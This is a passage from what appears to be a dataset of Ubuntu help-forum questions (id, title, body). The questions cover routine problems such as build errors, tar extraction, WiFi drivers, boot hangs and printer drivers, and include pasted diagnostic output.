1 ] : *** [ linux ] error 2 make [ 1 ] : leaving directory `/home/awytok/desktop/lua-5.2.3/src' make : *** [ linux ] error 2 i do n't want to , can not , and will not modify the file behind the make linux command with to extend it with parameters for -ansi -pedantic ... so i have two theories , it 's something wrong with the file behind make linux of lua , or with the additionally installed compiler gcc , hm ! i send a copy of this question also to the lua team !
486264	`` can not open : no such file or directory '' when extracting a tar file	i am trying to install apache cassandra that is a tar.gz file . the following is the output i am getting . 1st instance : tar -zxvf apache-cassandra-2.0.3-bin.tar.gz tar ( child ) : apache-cassandra-2.0.3-bin.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now 2nd instance : tar -zxvf apache-cassandra-2.0.3-bin.tar.gz.gitignore tar ( child ) : apache-cassandra-2.0.3-bin.tar.gz.gitignore : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now what to do ? the files i need to install are in a disk and not copied to the machine . does that matter ?
486266	where can i find an older ubuntu version of skype that still works with alsa ?	since version 4.3 of skype , alsa is no longer supported in favour of pulseaudio . i need alsa because several usb webcams are known not to work with pulseaudio . where can i download the last ubuntu .deb package version of skype that still supported alsa ?
486269	sending email with php ( smtp ) by apache 's user	i could send e-mail with php in ubuntu 12.04 . the apache user ( in ubuntu 12.04 ) didn' t make problem . but i ca n't send e-mail when i pass the ubuntu 14.04 . the apache user ( 覺n ubuntu 14.04 ) make problem ( maybe ) when i send email with send_email.php file which is in ../www/html/ directory . is this apache user 's permission problem ? which permission is gived to apache 's user ( mine is www-data ) to sending email with php..the send_email.php ca n't work after below libraries . when i do comment the libraries row in code , in this time send_email.php ca n't work after below code fragment . @ require_once 'mail.php ' ; @ require_once 'mail/mime.php ' ; $ smtp = mail : :factory ( 'smtp ' , array ( 'host ' = > $ host , 'port ' = > $ port , 'auth ' = > true , 'username ' = > $ username , 'password ' = > $ password ) ) ; mail.php and mail/mime.php libraries are not known . so that they are n't executed .
486271	how to install software to a different hard drive ?	hello my main hard drive that i have ubuntu installed on is almost completely used now so i need to figure out how to properly install software on a second hard drive ( non-usb ) . i have already reformatted the hard drive to ext4 using gparted and i have mounted the hard drive to a folder i created the path for , the path is /hdd if needed also , will simply dragging files for software to my other hard drive work ?
486272	dinotrace viewer installation	i have install dinotrace on ubuntu 12.10. instructions on this link : http : //www.veripool.org/projects/dinotrace/wiki/installing getting the following error in make cmd : server @ ubuntu : ~/downloads/dinotrace-9.4d $ make mkdir -p obj_dir making dinotrace in obj_dir cd obj_dir & & make -f /home/server/downloads/dinotrace-9.4d/src/makefile dinotrace make [ 1 ] : entering directory `/home/server/downloads/dinotrace-9.4d/obj_dir' gcc -i . -g -o2 -o3 -dhave_config_h -c /home/server/downloads/dinotrace-9.4d/src/dt_binary.c -o dt_binary.o in file included from /home/server/downloads/dinotrace-9.4d/src/dt_binary.c:57:0 : /home/server/downloads/dinotrace-9.4d/src/dinotrace.h:101:19 : fatal error : xm/xm.h : no such file or directory compilation terminated . make [ 1 ] : *** [ dt_binary.o ] error 1 make [ 1 ] : leaving directory `/home/server/downloads/dinotrace-9.4d/obj_dir' make : *** [ dinotrace_exe ] error 2
486275	make sure that sshd will automatically start after reboot	i am connected to a computer over ssh . i have to reboot it remotely , while making sure that i will be able to reconnect to it over ssh just after reboot . i install 'bum ' and marked sshd to be automatically started on boot . is there a way to be completely sure that sshd will automatically start after reboot . any help would be appreciated .
486276	watching online content with flash fills my root	when ever i watch online content that is streamed with flash my root partitions is filled . when i close firefox and clear my cache i immediately have about 2.5 gb free in my root . my home partition has much more free space , how can i force flash to download content to cache in my home partition ? update apparently , this was only happening with flash installed in ~/mozilla/plugin/libflashpayer.so . this was the latest supported version of adobe flash version 11.2.202.378 . switching to chromium browser solved the problem .
486281	graphics : vesa : mcp61 - mcp61-80	what does the graphics : graphics : vesa : mcp61 - mcp61-80 says please explain it in detail i am asking this because my pc gets stucked when i norrmally log into it . if i open it in recovery mode from the grub menu it is working very slow and the failsafex mode is showing can not detect your screen , graphics and devices.i guess it might be the problem of drivers but not know how to solve it.the problem might also be due to some other things unaware of . really need help guys.. thanks in advance .
486282	playing hd movies in 60fps ?	i 'd like to play movies in 60fps . something i had no trouble with in win8 , but i 'm wondering if i could achieve the same effect in kubuntu ? here 's an example : i have a .mkv movie which is recorded in standard 25fps and i want to make it smoother - to 60fps . i did it in windows using codecs , but kubuntu is quite different and i do n't know how ( or if this is even possible ) to do it . i do n't want to convert files - i want it to play it in real-time with 60fps . i have n't tried anything yet , because i do n't even know where to start . i tried to look for solution in google , but with no effect .
486283	adjusting high resolution timer	i am running an old ( 2002 ) game server for an fps . i have a slight issue with the the os being `` tickless '' . from what i understand the resolution timer is dynamic because of it and well it ends up kicking people out of the server ( time sync issue ) after it reaches a certain amount of load . it is dedicated box running ubuntu server 12.10 `` quantal quetzal '' ( 32bits ) i am aware that you can adjust this by recompiling the kernel however the tutorials seem slightly daunting and i 'm wondering if anyone understands this issue and knows a potential fix . any help would be very appreciated as i am an extreme linux nub . p.s . ssh only .
486284	installing ubuntu alongside windows 8 without partitioning	my disk partitions are as follow : c:6.88/49.1gb d:159/270gb e:239/292gb f:164/319gb windows 8 is running from c : the problem is that windows does n't allow me to partition my disk further , stating that i have exceed the maximum number of partitions . could anyone tell me how to go about dual-booting ? and also my windows is 32 bit and linux is going to 64 bit.this is n't gon na pose any problems right ? ( my hardware is 64 bit capable )
486287	virtualbox does n't run x64 vms with vagrant on ubuntu 12.04 x64	when i execute 'vagrant up ' the process end with 'connection timeout ... ' messages . trying to solve my problem i added 'ubuntu_64 ' to config file and enabled gui , but no results . the vms which were successfully run with vagrant are the debian wheezy 7.5 x32 built with puphpet and precise32 . as we can see , only x32 vms could be run on my machine . i do n't know why . here is my machine info : os : ubuntu 12.04 x64 processor : amd a8-4500m , 2 cores virtualization is enabled in bios . see screenshot similar to my bios view : screenshot the latest vagrant , virtualbox and virtualbox extensions pack are installed my user is added to virtualbox group thanks in advance .
486288	wifi problems with qualcomm atheros ar9462 adapter	i got some problems with my wifi adapter under ubuntu 14.04 . when i want to play games or watch videos from the web , i get frequently spikes and lags . it is annoying . so i pinged myself to see what 's wrong and i got this ( sometimes the ping is even higher ) : could not upload image directly . so please click on the link so i read many many forum posts about my adapter and wifi problems . most people solved the problem by adding options ath9k nohwcrypt=1 to /etc/modprobe.d/ath9k.conf . but this does n't work at all for me ! i also tried to disable wifi n for this adapter , but i do n't know how to do this . please can you help and do you have some advice for me ? and please tell me what log file do you need ( and the terminal command to get them ) beschreibung : kabellose verbindung produkt : ar9462 wireless network adapter hersteller : qualcomm atheros physische id : 0 bus-informationen : pci @ 0000:04:00.0 logischer name : wlan0 version : 01 seriennummer : 48 : d2:24:20 : f6:3e breite : 64 bits takt : 33mhz f채higkeiten : pm msi pciexpress bus_master cap_list rom ethernet physical wireless konfiguration : broadcast=yes driver=ath9k driverversion=3.13.0-29-generic firmware=n/a ip=192.168.1.23 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn ressourcen : irq:18 memory : b3500000-b357ffff memory:9ff00000-9ff0ffff thank you
486291	can not run ubuntu emulator on ubuntu12.04	i installed ubuntu emulator through ubuntu sdk . when i do ubuntu-emulator list i get my emulator name but when i do ubuntu-emulator run deviceone it says open /home/amarendra/.local/share/ubuntu-emulator/deviceone/.device : no such file or directory i have seen the content there is just one sdcard.img file at the error location . how can i resolved this ? new to ubuntu development .
486294	indicator icons do n't change on theme change	i have changed my theme but the battery , messaging and network icons wo n't change . it shows the regular gnome icons . how can i change these ? here 's a screenshot :
486297	how to select video quality from youtube-dl ?	i have installed youtube-dl in my 14.04 . i can download video by following command , $ youtube-dl [ youtube-link ] but i want to know how to select available pixel quality of youtube video ( i.e 1080p , 720p , 480p , etc ) and how to set to download best available video . in software description they said it 's possible ( shown in image below ) , but how to do..
486299	transfer files ( video , docs , programs ... ) from ntfs to ext3	i 'm about to install on my primary pc ( tower pc ) kubuntu . for the moment i have win7 installed . on this one i have 6 hdd : 1x ssd ( for the system ) , 2x hdd of 3tb , 2x hdd of 500gb and 1x hdd of 1tb . all those hdd and ssd are in ntfs file system . i saw on various forums that there could be problems transfering ntfs files on a ext3 hdd . my question is , is it better for me to let the ntfs format on all my hdd ( except for the ssd because i will install kubuntu on it ) or to transfer all my data to ext3 hdd ( but with a method that will not produce corrupting files and other problems ) ? thanks for your attention .
486300	how to remember which network connection to use ?	i have two connections : universal using dhcp and static ip for my home network . i 'm usualy at home , so i want to use my static home connection . but every reboot , it 's connected using dhcp and i have to change it manualy . so , how can i make network manager to use my home connection first ?
486303	ubuntu 14.04 - ca n't open display / could not open x display - nvidia ( all versions )	i have serious issues since i installed 14.04 on my machine.my graphics card is nvidia geforce gtx 680 . i have double xeon processors machine . on previous ubuntu 12.04 it worked nicely . i 've tried almost all versions of nvidia drivers avilable ( from nvidia website and open sources xorg-edgers/ppa ) since a week and still no success . all i can get is black screen and no even chance to switch to terminal . the only possible use of ubuntu is to use default nouveau drivers . it ca n't detect my screen - when i press xrandr to add new mode it says : ca n't open display :0.0 when i press xdiagnose it says : could not open x display . any workarounds anybody ?
486307	canon lbp7110cw does n't print with ubuntu 12.04	i installed the linux driver for my canon lbp7110cw printer on two pc : one with 32bits ubuntu 12.04 , the other with 64bits ubuntu 12.04 . here is the download link : http : //www.canon.fr/support/consumer_products/products/printers/laser/i-sensys_lbp7110cw.aspx the installation worked well . the printer is recognized by each pc . but when i print a test page or a document , nothing happens . an error message appears : on 64bits pc : for test page '' src = libcanon_pdlwrapper.c , line = 633 , err = -1짜ndebug : wrote 1 pages ... '' for document '' src = libcanon_pdlwrapper.c , line = 633 , err = -1짜nerror response : reqno=2 , seqno=3 , opvperrorno=-2 '' on 32bits pc for test page '' src = libcanon_pdlwrapper.c , line = 633 , err = -1짜ndebug2 : prtmarkersupplieslevel.1.1 = 100 '' for document '' src = libcanon_pdlwrapper.c , line = 633 , err = -1짜ndebug2 : prtmarkersupplieslevel.1.1 = 100 '' i need help please ! ljdn
486308	ubuntu 14.04 in lenovo g700 ca n't detect any wireless networks ?	i have a new lenovo g700 notebook , and just installed ubuntu 14.04 , but it seems not to be able to configure or list the wireless networks , how can i solve this problem : \ any advice will greatly appreciated , regards trying lspci -nn| grep 0280 gives back : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 )
486309	can not install ubuntu 14.04	i am a new user and do n't know anything about linux codes . when i tried installing ubuntu in addition to windows 7 , i get this error message saying `` press s to skip mount or m for manual recovery '' . how can i correct this problem ?
486310	error while booting ubuntu or can not create file update	can not create /var/lib/update-notifier/update-available : read only file system cat : /var/lib/update-notifier/updates-available : no such file ordirectory run-pats : /etc/update-motd.d/go-updater-available exited with return code 1 /usr/lib/ubuntu-release-upgrader/release-upgrade-motd : 39 : /usr/lib/ubuntu-release-upgrader/release-upgrade-motd : can not create /var/lib/ubuntu-release-upgrader/release-upgrade-available : read only file system /usr/lib/update-notifier/update-motd-fsck-at-reboot : 33 : /usr/lib/update-notifier/update-motd-fsck-at-reboot : can not create /var/lib/update-notifier/fsck-at-reboot : read only file system cat : /var/lib/update-notifier/fsck-at-reboot : no such file or directory run-parts : /etc/update-motd.d 198-fsck-at-reboot exited with return code 1 ... help me please..
486311	how to access the localhost which is in windows ?	i am having two machines one is installed with ubuntu and another one with windows 7 . in ubuntu installed lamp & in windows installed wamp here my question how to access the localhost in windows ( wamp ) from ubuntu ( lamp ) ? ? thanks in advance
486312	booting ubuntu of a usb 3.0 pen drive . is it using the superspeed	installed ubuntu 12.04 with persistence using unetbootin on a usb 3.0 pen drive . now booting from it.. i am not asking if ubuntu supports usb 3.0 . it does i am asking if it is connected at superspeed or just at usb 2.0 speeds ? is there anything i can do to verify that it is actually running at usb 3.0 speeds ? that is my question . the reason for doubt is that windows sometimes shows `` connected @ usb 3.0 `` and sometimes `` this device can do faster at usb 3.0 '' i do have the blue usb 3.0 ports .
486314	just before login-screen , a messages flashes by - how can i slow it down to read it ?	how ? i 'm talking about the screen that also informs me occasionally about drives being checked for errors ... are messages displayed there echoed to one of the logs ? which one ? is there a way to `` step through '' the boot process ? into which of the logs are messages at this stage normally written ?
486316	login screen very slow in ubuntu 12.04 lts	i have ubuntu 12.04 lts 64bit and my mouse in the login screen is very slow . i have seen this link it did not work for me . how can i fix this issue ?
486319	is there any way to block all downloads from chrome ?	i need to block anyone using this pc from downloading anything from the internet using chrome . is there any way possible ?
486321	ubuntu does n't reboot	i 'm using ubuntu 14.04 . lately , when i 'm trying to reboot or shutdown my ubuntu , it does n't shows the reboot dialog at all . however , i can reboot from terminal . what it can be ? thanks everyone !
486322	how can i install ubuntu on external hard drive ?	i want to install persistent ubuntu to my external usb hdd to be able to access my files and programs on any computer . it 's been discussed here , but i 'd like a more complete guide as to how do i install a distro on hdd , create partitions ( one of which would be visible in windows ) , etc . i 've heard that ntfs 4gb-file limitations affect it somehow . i 'm not planning on having files bigger than 4gb , i do , however , plan to use more space than 4gb total . once i download distro , do i need to burn the cd or can i use virtual cd drive program instead ?
486325	grub rescue commands to manage booting	i have deleted the partions of ububtu and now grub rescue promt is coming . i have windows 7 on the pc but it is not booting . how to resolve the issue.kindly let me know .
486329	tpm_tis operation timed out when booting 14.04 lts	since upgrading from 13.10 to 14.04 ( with do-release-upgrade ) my computer ( sony vgn-sz1vp ) hangs for 4 minutes when booting . [ 1.015598 ] tpm_tis 00:06 : 1.2 tpm ( device-id 0xb , rev-id 16 ) [ 1.019920 ] acpi : battery slot [ bat1 ] ( battery present ) [ 1.321725 ] isapnp : no plug & play device found [ 93.668058 ] random : nonblocking pool is initialized [ 121.040029 ] tpm_tis 00:06 : operation timed out [ 121.052385 ] tpm_tis 00:06 : a tpm error ( -62 ) occurred attempting to determine the timeouts [ 241.088029 ] tpm_tis 00:06 : operation timed out [ 241.100484 ] tpm_tis 00:06 : could not get tpm timeouts and durations so far i have tried : enabling and disabling tpm in the bios ( no change ) adding blacklist items for tpm_tis ( and other tpm modules ) in /etc/modprobe.d/blacklist-local.conf ( no change ) is there a boot parameter i can add to grub to tell the kernel to stop trying to communicate with the tpm hardware ?
486331	permanently add or remove alert to trust `` ssl certificate '' ?	as of recently , when i try to user air app for the service elance.com , i get this warning in ubuntu 14.04 . the only option i have is to trust for the current session . there is not permanently trust or similar option . this would not be much of a problem if i do n't suspend the system all the time ( rarely restart it ) . so after some time , the app simply stops responding and i have to restart the whole system . and as you may guess , this breakage will happen when i am in the middle of the work with dozens of apps or screens open . also , is it odd that i can not see this certificate ? i found a solution to copy the certificate into the adobe air certification configuration file , but i can not do that in my case .
486332	ubuntu 14.04 print screen button does not work	i 'm unable to use my print screen button in ubuntu 14.04 . no effect pressing print screen . screenshot application works if it 's launched manually .
486336	videos streaming with jw player not working	i found recently that any site that streams videos using jw player that the player gives me a message in my browser saying `` click here to install java '' . i confirmed that i do have icedtea-web plugin installed and i went to a java testing site here : http : //javatester.org/version.html and it shows that i have it installed . but i still keep getting the message that i need to install java on a site that streams a video using jw player . this just started happening a few days ago .
486337	ubuntu 14.04 bootloader install failed	hi today i decides to upgrade from 12.04 to 14.04 . everything worked in the last moment , a message poped up saying that my bootloader install had failed and would not let me install it on a different drive so i continued anyway and on boot i get a black screen . ps : i erased everything and installed ubuntu 14.04 five times . there where no external drives but 1 internal hhd and an internal ssd
486338	adding parameters to an `` open with '' application	i can tell the file browser what application to open when i double-click a document , but can i also tell it what command line options to always use when opening that kind of document ?
486345	bring gvim forward when i open a new tab from the command line	i like my vi command to open the file in gvim and to open it in a new tab if gvim is already running . function vi { if [ [ -z $ @ ] ] ; then gvim elif [ [ $ { 1:0:1 } = - ] ] ; then gvim `` $ @ '' else gvim -- remote-tab-silent `` $ @ '' fi } this works , but when i specify a filename and it opens in an existing gvim instance , it does n't bring the window to the front like it does on mac or windows . how can i make it so that when i enter a `` vi file.txt '' command in the terminal , it will make gvim the active window ?
486346	`` this account is currently not available '' error when trying to ssh	an error occurs when i try to make ssh connection : $ ssh -p 22 www-data @ x.x.x.x this account is currently not available
486347	bluetooth mouse not auto-reconnecting to laptop	this has been asked , and answered , a million times before . and i think i 've read almost all those questions and answers , and tried as many of the solutions as i can . however , i still ca n't get the mouse to automatically reconnect after a sleep , or a shutdown , or any cessation of use . i 'm using a microsoft sculpt comfort mouse under kubuntu 14.04 , 64bit . i can connect manually , of course . my latest effort was to add the lines < ! -- microsoft sculpt comfort mouse -- > < device oui= '' 28:18:78 : '' name= '' microsoft sculpt comfort mouse '' pin= '' 0000 '' / > to /usr/share/kde4/apps/bluedevilwizard/pin-code-database.xml and then restart bluetooth with sudo service bluetooth restart but nothing . the mouse still has to be manually paired . and just now , after trying a few hcitool commands - the mouse wo n't connect at all ! all i now get are timeout messages . i do n't know what i 've done , but as of now the mouse refuses to connect at all . i 'm a bit confused here ... .
486348	nautilus on xubuntu 's desktop ?	i like nautilus better than thunar , so i use nautilus on xubuntu , but thunar is still on the desktop . can i switch that somehow ?
486350	rtl8192ce connection drops and fluctuation on desktop with 14.04 64bit with encore n300 pci-e	running ubuntu 14.04 on a custom desktop . i have encore wireless n300 pci-e adapter ( seen here ) the driver is available for download at this link as well . i 've read that a possible fix for connection issues is to uninstall/reinstall the wireless driver . it seems like there should be some other options to try first . it only drops connection for a second , and then re connects . i can see the wifi icon constantly fluctuating weak to strong . note : i also have this posted for a few days in ubuntuforums and unix linux , but i 've gotten no response yet . i 'm just looking for a push in the right direction . lspci network controller : realtek semiconductor co. , ltd. rtl8192ce pcie wireless network adapter ( rev 01 lsmod | grep rtl rtl8192ce 53550 0 rtl_pci 26690 1 rtl8192ce rtlwifi 63475 2 rtl_pci , rtl8192ce rtl8192c_common 53172 1 rtl8192ce mac80211 626557 3 rtl_pci , rtlwifi , rtl8192ce cfg80211 484040 2 mac80211 , rtlwifi iwconfig | grep power eth0 no wireless extensions . lo no wireless extensions . bit rate=144.4 mb/s tx-power=20 dbm power management : off wireless script* # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux mike-system-product-name 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 09 ) subsystem : asustek computer inc. p8h77-i motherboard [ 1043:8505 ] kernel driver in use : r8169 06:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8192ce pcie wireless network adapter [ 10ec:8178 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. rtl8192ce pcie wireless network adapter [ 10ec:8178 ] kernel driver in use : rtl8192ce 07:00.0 usb controller [ 0c03 ] : asmedia technology inc. asm1042 superspeed usb host controller [ 1b21:1042 ] # # # # # lsusb # # # # # bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04d9 : a06b holtek semiconductor , inc . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 03f0:8904 hewlett-packard deskjet 6940 series bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : '' highmoon '' mode : managed frequency:2.437 ghz access point : < mac address removed > bit rate=144.4 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=70/70 signal level=20 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:88 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 search hsd1.pa.comcast.net # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : wlan0 [ highmoon ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192ce state : connected default : yes hw address : < mac address removed > capabilities : speed : 144 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) highmoon-guest : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 97 *highmoon : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 100 wpa2 ipv4 settings : address : 192.168.1.146 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 75.75.76.76 dns : 75.75.75.75 dns : 192.168.1.1 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=70/70 signal level=26 dbm encryption key : on essid : '' highmoon '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 0ms ago ie : unknown : 0008486967684d6f6f6e ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1afc181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606081500000000000000000000000000000000000000 ie : unknown : dd810050f204104a00011010440001021041000100103b0001031047001002519461683b1af5b2843176671bb6db102100074c696e6b7379731023000d4c696e6b7379732045343230301024000776312e302e30321042000234321054000800060050f20400011011000d4c696e6b737973204534323030100800020084103c000103 ie : unknown : dd090010180203f02c0000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 cell 02 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=70/70 signal level=26 dbm encryption key : off essid : '' highmoon-guest '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 0ms ago ie : unknown : 000e486967684d6f6f6e2d6775657374 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : unknown : 32040c121860 ie : unknown : 2d1afc181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606081100000000000000000000000000000000000000 ie : unknown : dd090010180200f02c0000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 # # # # # iwlist channel # # # # # wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz current frequency:2.437 ghz ( channel 6 ) # # # # # lsmod # # # # # rtl8192ce 53550 0 rtl_pci 26690 1 rtl8192ce rtlwifi 63475 2 rtl_pci , rtl8192ce rtl8192c_common 53172 1 rtl8192ce mac80211 626557 3 rtl_pci , rtlwifi , rtl8192ce cfg80211 484040 2 mac80211 , rtlwifi # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko firmware : rtlwifi/rtl8192cfwu_b.bin firmware : rtlwifi/rtl8192cfwu.bin firmware : rtlwifi/rtl8192cfw.bin description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : ef063698748457bbedb4633 alias : pci : v000010ecd00008176sv*sd*bc*sc*i* alias : pci : v000010ecd00008177sv*sd*bc*sc*i* alias : pci : v000010ecd00008178sv*sd*bc*sc*i* alias : pci : v000010ecd00008191sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , rtl8192c-common , mac80211 intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko description : pci basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 9b7f19319428ff0efe7e350 depends : mac80211 , rtlwifi intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 27e91755814596d634b7709 depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-29-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192c/rtl8192c-common.ko description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : ziv huang < ziv_huang @ realtek.com > author : georgia < georgia @ realtek.com > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 32f826c623bc49f764f7974 depends : intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 # # # # # modules # # # # # lp rtc coretemp nct6775 coretemp nct6775 # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8178 ( rtl8192ce ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac 